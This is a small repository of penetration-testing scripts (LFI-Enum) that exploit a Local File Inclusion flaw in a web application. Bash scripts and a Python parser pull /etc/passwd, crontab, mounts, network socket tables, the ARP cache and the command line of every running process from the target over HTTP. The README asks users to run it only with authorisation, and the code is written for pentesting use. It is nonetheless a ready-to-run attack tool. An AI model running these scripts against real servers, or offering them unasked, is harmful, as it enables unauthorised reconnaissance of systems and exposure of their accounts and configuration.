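├── README.md
├── common-files
├── network-info
├── process-info
└── utils
    └── linux_net_tcp.py

/README.md:
--------------------------------------------------------------------------------
# LFI-Enum
Scripts to enumerate Linux servers through a Local File Inclusion (LFI) vulnerability.

Only run these against systems you are authorized to test. Every script sends
one HTTP request per file it reads, and `process-info` sends one request per
PID up to the server's `pid_max`, so the activity is noisy and will show up in
the target's web server logs.

# Usage
`bash script-name http://server.vulnerable.com/download.php?file=`

The argument is used as a prefix: the absolute path of each file is appended
to it unchanged, so the scripts assume the vulnerable parameter returns the raw
file content (no prefix or suffix added by the application).

# Scripts
### process-info
Collect information about running processes (PID and command line) by reading
`/proc/<pid>/cmdline` for every PID up to the server's `/proc/sys/kernel/pid_max`.

### network-info
Collect information about the network such as open ports, the ARP table and interfaces.

### common-files
Get the content of common files such as `/etc/passwd`, `/etc/crontab` and others.

# Util script
- `/proc/net/tcp` parser - [linux_net_tcp.py](https://gist.github.com/Reboare/2e0122b993b8557935fd37b27436f8c2)
--------------------------------------------------------------------------------
/common-files:
--------------------------------------------------------------------------------
#!/bin/bash
# Fetch a fixed list of well-known files through an LFI and print each one.
#
# Usage: common-files <url-prefix>
#   The absolute path of every file is appended verbatim to <url-prefix>.
set -u

if [[ $# -lt 1 || -z "$1" ]]; then
    echo "usage: $0 <url-prefix>" >&2
    exit 1
fi

url="$1"
# A bounded timeout keeps one hanging request from stalling the whole run.
curl_opts=(--silent --max-time 60)

# World-readable on most distributions; they reveal accounts, scheduled jobs,
# mounts, kernel/distro version, DNS configuration and the hostname.
files=(
    "/etc/passwd"
    "/etc/crontab"
    "/proc/mounts"
    "/etc/issue"
    "/proc/version"
    "/etc/resolv.conf"
    "/etc/hostname"
    "/etc/anacrontab"
)

for filename in "${files[@]}"; do
    echo "----$filename----"
    # stdout is left untouched so the raw file content can be redirected.
    curl "${curl_opts[@]}" "$url$filename"
    echo
done
--------------------------------------------------------------------------------
/network-info:
--------------------------------------------------------------------------------
#!/bin/bash
# Enumerate the target's network state through an LFI: TCP and UDP sockets,
# the ARP cache and the interface names.
#
# Usage: network-info <url-prefix>
set -u

if [[ $# -lt 1 || -z "$1" ]]; then
    echo "usage: $0 <url-prefix>" >&2
    exit 1
fi

url="$1"
curl_opts=(--silent --max-time 60)

# Resolve the parser relative to this script, not to the caller's cwd, so the
# script works when invoked from outside the repository root.
script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
parser="$script_dir/utils/linux_net_tcp.py"
python_bin="$(command -v python3 || command -v python)"
if [[ -z "$python_bin" ]]; then
    echo "error: python3/python not found in PATH" >&2
    exit 1
fi

tempfile="$(mktemp)"
# Remove the scratch file on any exit; it holds data fetched from the target.
trap 'rm -f "$tempfile"' EXIT

# /proc/net/tcp and /proc/net/udp share the same column layout, so one parser
# serves both. The parser lists every socket in the table, not only listeners.
# Only the IPv4 tables are fetched here; IPv6 lives in /proc/net/tcp6 and
# /proc/net/udp6.
curl "${curl_opts[@]}" "$url/proc/net/tcp" -o "$tempfile"
echo "TCP Sockets"
"$python_bin" "$parser" "$tempfile"
echo

curl "${curl_opts[@]}" "$url/proc/net/udp" -o "$tempfile"
echo "UDP Sockets"
"$python_bin" "$parser" "$tempfile"
echo

echo "ARP Table"
curl "${curl_opts[@]}" "$url/proc/net/arp"
echo

echo "Interfaces"
# /proc/net/dev has two header lines, then one "  iface: counters..." line per
# interface; keep only the interface names.
curl "${curl_opts[@]}" "$url/proc/net/dev" | cut -d ":" -f 1 | tail -n +3 | sort -u | sed -e 's/[ \t]*//'
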
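--------------------------------------------------------------------------------
/process-info:
--------------------------------------------------------------------------------
#!/bin/bash
# List the target's running processes through an LFI by reading
# /proc/<pid>/cmdline for every PID from 1 to the server's pid_max.
#
# Usage: process-info <url-prefix>
#   MAX_PID=<n>  in the environment caps the scan (pid_max is frequently
#                4194304, i.e. millions of requests).
#   MAX_JOBS=<n> sets the number of parallel fetches (default 20).
set -eu

if [[ $# -lt 1 || -z "$1" ]]; then
    echo "usage: $0 <url-prefix>" >&2
    exit 1
fi

max="${MAX_JOBS:-20}"
url="$1"
curl_opts=(--silent --max-time 60)

# pid_max comes from the remote server and is used in an arithmetic context
# below. bash expands array subscripts and command substitutions inside (( )),
# so a hostile (or simply HTML) response like 'a[$(cmd)]' would run commands
# on the operator's machine. Accept nothing but a plain integer.
maxpid="${MAX_PID:-$(curl "${curl_opts[@]}" "$url/proc/sys/kernel/pid_max" | tr -d '[:space:]')}"
if [[ ! "$maxpid" =~ ^[0-9]+$ ]]; then
    echo "error: could not read pid_max from target (got: ${maxpid:0:80})" >&2
    exit 1
fi
if [[ ! "$max" =~ ^[1-9][0-9]*$ ]]; then
    echo "error: MAX_JOBS must be a positive integer" >&2
    exit 1
fi

# Fetch /proc/<arg>/cmdline and flatten it to one printable line: NUL argument
# separators become spaces (keeping short arguments that `strings` would drop),
# control characters and other non-printable bytes from the response are
# removed, and the space left by the trailing NUL is trimmed.
fetch_cmdline() {
    local out
    out="$(curl "${curl_opts[@]}" "$url/proc/$1/cmdline" | tr '\000\r\n' '   ' | tr -cd '[:print:]')"
    printf '%s' "${out% }"
}

# Command line of the process answering our own request (/proc/self); it is
# filtered out of the listing since it is just the web server serving us.
selfcmdline="$(fetch_cmdline self)"

# Print "PID: <pid>\t<cmdline>" for one PID if it exists and is not ourselves.
# printf %s is used instead of echo -e so that escape sequences embedded in a
# remote command line are never interpreted by the terminal.
function getpid(){
    local pid="$1"
    local cmdline
    cmdline="$(fetch_cmdline "$pid")"
    if [[ "$cmdline" != "" && "$cmdline" != "$selfcmdline" ]]; then
        printf 'PID: %s\t%s\n' "$pid" "$cmdline"
    fi
}

for ((pid=1; pid<=maxpid; pid++)); do
    # Throttle to $max concurrent fetches.
    while [[ $(jobs -rp | wc -l) -gt "$max" ]]; do
        sleep 0.3
    done
    getpid "$pid" &
done
# Do not return before the last batch of background fetches has printed.
wait
--------------------------------------------------------------------------------
/utils/linux_net_tcp.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""Pretty-print a saved copy of /proc/net/tcp (also udp, tcp6, udp6).

Usage: linux_net_tcp.py <file>        (Python 3)

The kernel prints socket addresses as hex in host byte order (little-endian on
x86/ARM): IPv4 as one 32-bit word, IPv6 as four 32-bit words. Ports are plain
big-endian hex. This script decodes them and prints one socket per line; the
column header goes to stderr so stdout stays machine-readable.

The input is fetched from a remote, possibly hostile, server through an LFI,
so malformed lines are skipped instead of crashing the parser and nothing in
the file is ever evaluated.
"""
import ipaddress
import re
import sys

# From include/net/tcp_states.h. /proc/net/udp reuses 07 (CLOSE) for
# unconnected sockets and 01 (ESTABLISHED) for connected ones.
TCP_STATES = {
    "01": "ESTABLISHED",
    "02": "SYN_SENT",
    "03": "SYN_RECV",
    "04": "FIN_WAIT1",
    "05": "FIN_WAIT2",
    "06": "TIME_WAIT",
    "07": "CLOSE",
    "08": "CLOSE_WAIT",
    "09": "LAST_ACK",
    "0A": "LISTEN",
    "0B": "CLOSING",
    "0C": "NEW_SYN_RECV",
}

# Column layout of /proc/net/{tcp,udp}{,6}:
#   sl local_address rem_address st tx_queue:rx_queue tr:tm->when retrnsmt uid timeout inode ...
_MIN_FIELDS = 10

COLUMNS = ("seq", "uid", "inode", "local", "remote", "state", "timeout")


def process_file(procnet):
    """Return the socket lines of a /proc/net/* dump: header dropped, whitespace stripped.

    Blank lines are ignored, so a file with or without a trailing newline gives
    the same result (the previous ``split('\\n')[1:-1]`` silently lost the last
    socket whenever the trailing newline was missing).
    """
    lines = procnet.splitlines()[1:]
    return [line.strip() for line in lines if line.strip()]


def split_every_n(data, n):
    """Split ``data`` into consecutive chunks of length ``n`` (the last may be shorter)."""
    return [data[i:i + n] for i in range(0, len(data), n)]


def convert_linux_netaddr(address):
    """Decode a ``HEXADDR:HEXPORT`` field from /proc/net/* into ``addr:port``.

    IPv4 (8 hex chars) is one little-endian 32-bit word and is rendered as
    dotted decimal; IPv6 (32 hex chars) is four little-endian 32-bit words and
    is rendered as ``[addr]:port``.

    Raises ValueError for anything that is not hex of one of those two lengths
    so that callers can skip corrupted lines.
    """
    hex_addr, hex_port = address.split(':')
    port = int(hex_port, 16)

    if len(hex_addr) == 8:
        raw = bytes.fromhex(hex_addr)[::-1]
        return "{}:{}".format(ipaddress.IPv4Address(raw), port)
    if len(hex_addr) == 32:
        # Each 32-bit word is byte-swapped independently.
        raw = b"".join(bytes.fromhex(word)[::-1] for word in split_every_n(hex_addr, 8))
        return "[{}]:{}".format(ipaddress.IPv6Address(raw), port)
    raise ValueError("unexpected address length: {!r}".format(address))


def parse_socket_line(line):
    """Parse one stripped socket line into a row dict, or return None if it is malformed.

    Short lines (e.g. an application error page wrapped around the LFI output)
    and undecodable addresses are rejected rather than raising.
    """
    fields = re.split(r'\s+', line)
    if len(fields) < _MIN_FIELDS:
        return None
    try:
        return {
            'seq': fields[0],
            'local': convert_linux_netaddr(fields[1]),
            'remote': convert_linux_netaddr(fields[2]),
            # Unknown state codes are shown raw rather than hidden.
            'state': TCP_STATES.get(fields[3].upper(), fields[3]),
            'uid': fields[7],
            'timeout': fields[8],
            'inode': fields[9],
        }
    except ValueError:
        return None


def format_line(data):
    """Render one row (or the header dict) as a fixed-width line ending in a newline.

    ``state`` is optional so rows built without it still format.
    """
    row = dict(data)
    row.setdefault('state', '')
    return ("%(seq)-4s %(uid)5s %(local)25s %(remote)25s %(state)-12s %(timeout)8s %(inode)8s" % row) + "\n"


def main(argv):
    """Read the file named in ``argv[1]`` and print the socket table; return an exit code."""
    if len(argv) != 2:
        sys.stderr.write("usage: {} <proc-net-file>\n".format(argv[0]))
        return 2

    # errors="replace": the content is remote and need not be valid UTF-8.
    with open(argv[1], encoding="utf-8", errors="replace") as f:
        sockets = process_file(f.read())

    rows = [row for row in (parse_socket_line(s) for s in sockets) if row is not None]

    # Header only when there is something to head, and on stderr so stdout
    # can be piped into further tooling.
    if rows:
        sys.stderr.write(format_line({c: c for c in COLUMNS}))
    for row in rows:
        sys.stdout.write(format_line(row))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
--------------------------------------------------------------------------------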